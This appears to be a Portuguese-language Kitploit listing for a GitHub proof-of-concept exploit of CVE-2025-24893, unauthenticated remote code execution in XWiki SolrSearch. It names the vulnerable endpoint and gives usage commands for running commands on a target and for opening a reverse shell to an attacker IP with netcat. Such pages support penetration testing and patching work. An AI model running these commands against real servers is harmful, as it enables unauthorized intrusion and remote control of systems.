Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
xwiki_solrsearch-rce-exploit — PoC de RCE não autenticado para XWiki SolrSearch (CVE-2025-24893). Execução de comandos + shell reverso. | Kitploit
Ferramentas/GitHubGitHub/torjan0/xwiki_solrsearch-rce-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubtorjan0/xwiki_solrsearch-rce-exploit

xwiki_solrsearch-rce-exploit

PoC de RCE não autenticado para XWiki SolrSearch (CVE-2025-24893). Execução de comandos + shell reverso.

Ver Repositório
112há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

solrsearch-rce-exploit

PoC de RCE não autenticada para XWiki SolrSearch (CVE-2025-24893). Execução de comandos + shell reversa.

CVE-2025-24893 – PoC de RCE do XWiki SolrSearch

Prova de conceito para a injeção de template SolrSearch do XWiki que leva à execução remota de código não autenticada.

Testado contra XWiki Debian 15.10.8 (corrigido nas versões 15.10.11 / 16.4.1 / 16.5.0RC1).

⚠️ Apenas para uso educacional. Não execute isto contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.

O que faz

  • Envia payloads Groovy personalizados por meio de /xwiki/bin/get/Main/SolrSearch.
  • Executa comandos arbitrários e envolve a saída em marcadores Base64 para decodificação limpa.
  • Suporta o lançamento de uma shell reversa usando soquetes Java.

Requisitos

  • Python 3.x
  • Instale as dependências com:
root@kitploit:~
pip install requests

Uso

Especifique o host alvo (e o caminho opcional) ao executar o script.

Execute comandos básicos:

root@kitploit:~
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"

Inicie uma shell reversa:

root@kitploit:~
# On attacker box
nc -lvnp 4444

# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444

Notas

  • Endpoint: /xwiki/bin/get/Main/SolrSearch?media=rss&text=...
  • A saída Base64 limpa garante uma análise confiável.
  • Originalmente demonstrado durante o HTB Editor, mas aplicável a outras instâncias vulneráveis.
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
Baixar ferramenta